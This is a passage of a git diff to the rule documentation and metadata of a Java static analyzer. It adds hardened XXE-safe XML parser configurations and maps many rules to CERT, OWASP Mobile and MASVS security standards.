-SchemaFactory library:
-
-String xsd = "xxe.xsd";
-StreamSource xsdStreamSource = new StreamSource(xsd);
-SchemaFactory schemaFactory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
-schemaFactory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // Compliant
-schemaFactory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
-Schema schema = schemaFactory.newSchema(xsdStreamSource);
-
-Validator library:
-
-String xsd = "xxe.xsd";
-String xml = "xxe.xml";
-StreamSource xsdStreamSource = new StreamSource(xsd);
-StreamSource xmlStreamSource = new StreamSource(xml);
+SAXParserFactory factory = SAXParserFactory.newInstance();
+// to be compliant, completely disable DOCTYPE declaration:
+factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
+// or completely disable external entities declarations:
+factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
+factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
+// or prohibit the use of all protocols by external entities:
+SAXParser parser = factory.newSAXParser(); // Noncompliant
+parser.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
+parser.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
-SchemaFactory schemaFactory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
-Schema schema = schemaFactory.newSchema(xsdStreamSource);
-schemaFactory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
-schemaFactory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
-// validators will also inherit of these properties
-Validator validator = schema.newValidator();
+XMLInputFactory factory = XMLInputFactory.newInstance();
+// to be compliant, completely disable DOCTYPE declaration:
+factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
+// or completely disable external entities declarations:
+factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, Boolean.FALSE);
+// or prohibit the use of all protocols by external entities:
+factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
+factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
-validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
-validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // Compliant
+TransformerFactory factory = javax.xml.transform.TransformerFactory.newInstance();
+// to be compliant, prohibit the use of all protocols by external entities:
+factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
+factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
-StringWriter writer = new StringWriter();
-validator.validate(xmlStreamSource, new StreamResult(writer));
+SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
+// to be compliant, completely disable DOCTYPE declaration:
+factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
+// or prohibit the use of all protocols by external entities:
+factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
+factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
-For dom4j library, ACCESS_EXTERNAL_DTD and ACCESS_EXTERNAL_SCHEMA are not supported, thus a very strict fix
-is to disable doctype declarations:
+For Dom4j library:
SAXReader xmlReader = new SAXReader();
-xmlReader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); // Compliant
-Document xmlResponse = xmlReader.read(xml);
+xmlReader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
-Jdom2 library:
+For Jdom2 library:
-SAXBuilder builder = new SAXBuilder(); // Compliant
-builder.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
-builder.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // Compliant
-Document document = builder.build(new File(xml));
+SAXBuilder builder = new SAXBuilder();
+builder.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
+builder.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
See
+ - Oracle Java Documentation - XML External Entity Injection Attack
- OWASP Top 10 2017 Category A4 - XML External Entities
(XXE)
- OWASP XXE Prevention Cheat
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2886_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2886_java.json
index 2198574f1e1..8ab5881520d 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2886_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2886_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-2886",
"sqKey": "S2886",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "VNA01-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3011_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3011_java.json
index e9e8a631ade..4130cb08ec0 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3011_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3011_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-3011",
"sqKey": "S3011",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "SEC05-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3014_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3014_java.json
index 8c2bc3f95ff..137205fd774 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3014_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3014_java.json
@@ -14,5 +14,10 @@
"defaultSeverity": "Blocker",
"ruleSpecification": "RSPEC-3014",
"sqKey": "S3014",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "THI01-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3034_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3034_java.json
index eb47d427962..74946d0b5c6 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3034_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3034_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-3034",
"sqKey": "S3034",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "NUM52-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3064_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3064_java.json
index 55393f9840c..89d9ea5abf2 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3064_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3064_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-3064",
"sqKey": "S3064",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "LCK10-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3067_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3067_java.json
index 5f81a4cbedc..a66de939741 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3067_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3067_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-3067",
"sqKey": "S3067",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "LCK02-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3077_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3077_java.json
index 98e82c14fd5..0ab4816fe32 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3077_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3077_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Minor",
"ruleSpecification": "RSPEC-3077",
"sqKey": "S3077",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "CON50-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3078_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3078_java.json
index 0178d33e2a1..b0aee47aa87 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3078_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3078_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-3078",
"sqKey": "S3078",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "VNA02-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3329_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3329_java.json
index 8e8b01d8966..3a7ad153370 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3329_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3329_java.json
@@ -8,7 +8,8 @@
},
"tags": [
"cwe",
- "owasp-a6"
+ "owasp-a6",
+ "owasp-m5"
],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-3329",
@@ -17,10 +18,17 @@
"securityStandards": {
"CWE": [
330,
- 329
+ 329,
+ 340
],
"OWASP": [
"A6"
+ ],
+ "OWASP Mobile": [
+ "M5"
+ ],
+ "MASVS": [
+ "MSTG-CRYPTO-6"
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3346_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3346_java.json
index 21946064353..ccbdf98e25d 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3346_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3346_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-3346",
"sqKey": "S3346",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "EXP06-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3366_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3366_java.json
index 59e95723b28..816646dc951 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3366_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3366_java.json
@@ -14,5 +14,11 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-3366",
"sqKey": "S3366",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "TSM01-J.",
+ "TSM03-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3457_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3457_java.json
index 0069c96c65e..98e064825fc 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3457_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3457_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-3457",
"sqKey": "S3457",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "FIO47-C."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3518_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3518_java.json
index a2464cea3ba..54bbb3d6d27 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3518_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3518_java.json
@@ -18,6 +18,10 @@
"securityStandards": {
"CWE": [
369
+ ],
+ "CERT": [
+ "NUM02-J.",
+ "INT33-C."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3551_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3551_java.json
index ae8b6ee6be0..a71a4b81f8b 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3551_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3551_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-3551",
"sqKey": "S3551",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "TSM00-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4423_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4423_java.json
index 162685e2d14..48a53bcfe74 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4423_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4423_java.json
@@ -11,7 +11,8 @@
"privacy",
"owasp-a6",
"sans-top25-porous",
- "owasp-a3"
+ "owasp-a3",
+ "owasp-m3"
],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-4423",
@@ -26,6 +27,12 @@
"OWASP": [
"A3",
"A6"
+ ],
+ "OWASP Mobile": [
+ "M3"
+ ],
+ "MASVS": [
+ "MSTG-NETWORK-2"
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4426_java.html b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4426_java.html
index ffade10406b..e7503f1a808 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4426_java.html
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4426_java.html
@@ -47,6 +47,10 @@
See
- OWASP Top 10 2017 Category A6 - Security
Misconfiguration
+ - Mobile AppSec
+ Verification Standard - Cryptography Requirements
+ - OWASP Mobile Top 10 2016 Category M5 -
+ Insufficient Cryptography
- NIST 800-131A - Recommendation for Transitioning the
Use of Cryptographic Algorithms and Key Lengths
- MITRE, CWE-326 - Inadequate Encryption Strength
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4426_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4426_java.json
index 6c8c7b57fe4..5795bdcb4b9 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4426_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4426_java.json
@@ -24,6 +24,12 @@
"OWASP": [
"A3",
"A6"
+ ],
+ "OWASP Mobile": [
+ "M5"
+ ],
+ "MASVS": [
+ "MSTG-CRYPTO-3"
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4512_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4512_java.json
index 6a9c94f1bbb..4f08d11262c 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4512_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4512_java.json
@@ -21,6 +21,9 @@
],
"OWASP": [
"A1"
+ ],
+ "CERT": [
+ "MSC61-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4635_java.html b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4635_java.html
index 3cfb503bebf..10935de7743 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4635_java.html
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4635_java.html
@@ -10,13 +10,14 @@
-
startsWith(String prefix)
For each of these methods, another method with an additional parameter is available to specify an offset.
-Using these methods gives the same result while avoiding the creation of additional String instances.
+Using these methods will avoid the creation of additional String instances. For indexOf methods, adjust the returned value by
+subtracting the substring index parameter to obtain the same result.
Noncompliant Code Example
str.substring(beginIndex).indexOf(char1); // Noncompliant; a new String is going to be created by "substring"
Compliant Solution
-str.indexOf(char1, beginIndex);
+str.indexOf(char1, beginIndex) - beginIndex; // index for char1 not found is (-1-beginIndex)
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4790_java.html b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4790_java.html
index c0cace1ee99..1c934c62877 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4790_java.html
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4790_java.html
@@ -29,6 +29,10 @@ See
OWASP Top 10 2017 Category A6 - Security
Misconfiguration
+ Mobile AppSec
+ Verification Standard - Cryptography Requirements
+ OWASP Mobile Top 10 2016 Category M5 -
+ Insufficient Cryptography
MITRE, CWE-327 - Use of a Broken or Risky Cryptographic Algorithm
MITRE, CWE-916 - Use of Password Hash With Insufficient Computational Effort
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4790_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4790_java.json
index 48d59888503..b02911d4df3 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4790_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4790_java.json
@@ -7,7 +7,8 @@
"spring",
"owasp-a6",
"sans-top25-porous",
- "owasp-a3"
+ "owasp-a3",
+ "owasp-m5"
],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-4790",
@@ -22,6 +23,12 @@
"OWASP": [
"A3",
"A6"
+ ],
+ "OWASP Mobile": [
+ "M5"
+ ],
+ "MASVS": [
+ "MSTG-CRYPTO-4"
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4830_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4830_java.json
index a05b2fa6755..3bc7d193407 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4830_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4830_java.json
@@ -25,6 +25,15 @@
"OWASP": [
"A6",
"A3"
+ ],
+ "OWASP Mobile": [
+ "M3"
+ ],
+ "MASVS": [
+ "MSTG-NETWORK-3"
+ ],
+ "CERT": [
+ "MSC61-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4973_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4973_java.json
index 79c95d94e44..95c2ebd6945 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4973_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4973_java.json
@@ -18,6 +18,10 @@
"CWE": [
595,
597
+ ],
+ "CERT": [
+ "EXP03-J.",
+ "EXP50-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5042_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5042_java.json
index 5362d997741..5ba769f3628 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5042_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5042_java.json
@@ -23,6 +23,9 @@
"OWASP": [
"A5",
"A6"
+ ],
+ "CERT": [
+ "IDS04-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5320_java.html b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5320_java.html
index 7ed65d099f2..ca1d035c5c5 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5320_java.html
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5320_java.html
@@ -51,8 +51,10 @@ Sensitive Code Example
See
- - OWASP Top 10 2017 Category A3 - Sensitive Data Exposure
-
+ - Mobile AppSec Verification
+ Standard - Platform Interaction Requirements
+ - OWASP Mobile Top 10 2016 Category M1 - Improper
+ Platform Usage
- MITRE, CWE-927 - Use of Implicit Intent for Sensitive Communication
- Android documentation -
Broadcast Overview - Security considerations and best practices
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5320_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5320_java.json
index 16bf679de76..4312e0396c6 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5320_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5320_java.json
@@ -5,7 +5,7 @@
"tags": [
"cwe",
"android",
- "owasp-a3"
+ "owasp-m1"
],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-5320",
@@ -15,8 +15,11 @@
"CWE": [
927
],
- "OWASP": [
- "A3"
+ "OWASP Mobile": [
+ "M1"
+ ],
+ "MASVS": [
+ "MSTG-PLATFORM-4"
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5322_java.html b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5322_java.html
index f7fdfc1dd1b..2e6375f6006 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5322_java.html
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5322_java.html
@@ -47,7 +47,10 @@ Sensitive Code Example
See
- - OWASP Top 10 2017 Category A1 - Injection
+ - Mobile AppSec Verification
+ Standard - Platform Interaction Requirements
+ - OWASP Mobile Top 10 2016 Category M1 - Improper
+ Platform Usage
- MITRE, CWE-925 - Improper Verification of Intent by Broadcast Receiver
- SANS Top 25 - Insecure Interaction Between Components
- Android documentation -
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5322_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5322_java.json
index c29ccafc2cd..282608a1316 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5322_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5322_java.json
@@ -4,7 +4,7 @@
"status": "ready",
"tags": [
"cwe",
- "owasp-a1",
+ "owasp-m1",
"sans-top25-insecure",
"android"
],
@@ -16,8 +16,11 @@
"CWE": [
925
],
- "OWASP": [
- "A1"
+ "OWASP Mobile": [
+ "M1"
+ ],
+ "MASVS": [
+ "MSTG-PLATFORM-2"
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5324_java.html b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5324_java.html
index a162deb76b3..15f6d7bbb76 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5324_java.html
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5324_java.html
@@ -44,11 +44,11 @@
See
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5324_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5324_java.json
index 58cbe76a559..b879edb0b2f 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5324_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5324_java.json
@@ -4,11 +4,10 @@
"status": "ready",
"tags": [
"cwe",
- "owasp-a1",
"sans-top25-risky",
"android",
"sans-top25-porous",
- "owasp-a3"
+ "owasp-m2"
],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-5324",
@@ -16,12 +15,13 @@
"scope": "Main",
"securityStandards": {
"CWE": [
- 312,
- 20
+ 312
],
- "OWASP": [
- "A1",
- "A3"
+ "OWASP Mobile": [
+ "M2"
+ ],
+ "MASVS": [
+ "MSTG-STORAGE-1"
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5332_java.html b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5332_java.html
index 293ee2827f5..286183246b4 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5332_java.html
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5332_java.html
@@ -86,6 +86,10 @@ See
- OWASP Top 10 2017 Category A3 - Sensitive Data Exposure
+ - Mobile AppSec Verification
+ Standard - Network Communication Requirements
+ - OWASP Mobile Top 10 2016 Category M3 - Insecure
+ Communication
- MITRE, CWE-200 - Exposure of Sensitive Information to an Unauthorized Actor
- MITRE, CWE-319 - Cleartext Transmission of Sensitive Information
- Google, Moving towards more secure web
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5332_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5332_java.json
index d9e5b2eefb6..52063608be3 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5332_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5332_java.json
@@ -4,7 +4,8 @@
"status": "ready",
"tags": [
"cwe",
- "owasp-a3"
+ "owasp-a3",
+ "owasp-m3"
],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-5332",
@@ -17,6 +18,12 @@
],
"OWASP": [
"A3"
+ ],
+ "OWASP Mobile": [
+ "M3"
+ ],
+ "MASVS": [
+ "MSTG-NETWORK-1"
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5443_java.html b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5443_java.html
index 7783a6eba20..f8ff121c60f 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5443_java.html
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5443_java.html
@@ -56,12 +56,20 @@ Sensitive Code Example
Compliant Solution
-new File("/myDirectory/myfile.txt");
+new File("/myDirectory/myfile.txt"); // Compliant
-File.createTempFile("prefix", "suffix", new File("/mySecureDirectory"));
+File.createTempFile("prefix", "suffix", new File("/mySecureDirectory")); // Compliant
-FileAttribute<Set<PosixFilePermission>> attr = PosixFilePermissions.asFileAttribute(PosixFilePermissions.fromString("w+"));
-Files.createTempFile("prefix", "suffix", attr); // Compliant, created with explicit attributes.
+if(SystemUtils.IS_OS_UNIX) {
+ FileAttribute<Set<PosixFilePermission>> attr = PosixFilePermissions.asFileAttribute(PosixFilePermissions.fromString("rwx------"));
+ Files.createTempFile("prefix", "suffix", attr); // Compliant
+}
+else {
+ File f = Files.createTempFile("prefix", "suffix").toFile(); // Compliant
+ f.setReadable(true, true);
+ f.setWritable(true, true);
+ f.setExecutable(true, true);
+}
See
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5527_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5527_java.json
index 81cb79edaac..408b8922ca5 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5527_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5527_java.json
@@ -11,7 +11,8 @@
"privacy",
"owasp-a6",
"ssl",
- "owasp-a3"
+ "owasp-a3",
+ "owasp-m3"
],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-5527",
@@ -25,6 +26,12 @@
"OWASP": [
"A3",
"A6"
+ ],
+ "OWASP Mobile": [
+ "M3"
+ ],
+ "MASVS": [
+ "MSTG-NETWORK-3"
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5542_java.html b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5542_java.html
index c0100350a4a..a31fbf0eaf6 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5542_java.html
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5542_java.html
@@ -33,6 +33,10 @@ See
- OWASP Top 10 2017 Category A6 - Security
Misconfiguration
+ - Mobile AppSec
+ Verification Standard - Cryptography Requirements
+ - OWASP Mobile Top 10 2016 Category M5 -
+ Insufficient Cryptography
- MITRE, CWE-327 - Use of a Broken or Risky Cryptographic Algorithm
- CERT, MSC61-J. - Do not use insecure or weak cryptographic algorithms
- SANS Top 25 - Porous Defenses
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5542_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5542_java.json
index af799b11da3..e6da37e4cc4 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5542_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5542_java.json
@@ -9,10 +9,10 @@
"tags": [
"cwe",
"privacy",
- "cert",
"owasp-a6",
"sans-top25-porous",
- "owasp-a3"
+ "owasp-a3",
+ "owasp-m5"
],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-5542",
@@ -26,6 +26,15 @@
"OWASP": [
"A6",
"A3"
+ ],
+ "OWASP Mobile": [
+ "M5"
+ ],
+ "MASVS": [
+ "MSTG-CRYPTO-3"
+ ],
+ "CERT": [
+ "MSC61-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5547_java.html b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5547_java.html
index a382beef575..830fa089200 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5547_java.html
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5547_java.html
@@ -50,6 +50,10 @@ See
- OWASP Top 10 2017 Category A3 - Sensitive Data Exposure
+ - Mobile AppSec
+ Verification Standard - Cryptography Requirements
+ - OWASP Mobile Top 10 2016 Category M5 -
+ Insufficient Cryptography
- MITRE, CWE-327 - Use of a Broken or Risky Cryptographic Algorithm
- CERT, MSC61-J. - Do not use insecure or weak cryptographic algorithms
- SANS Top 25 - Porous Defenses
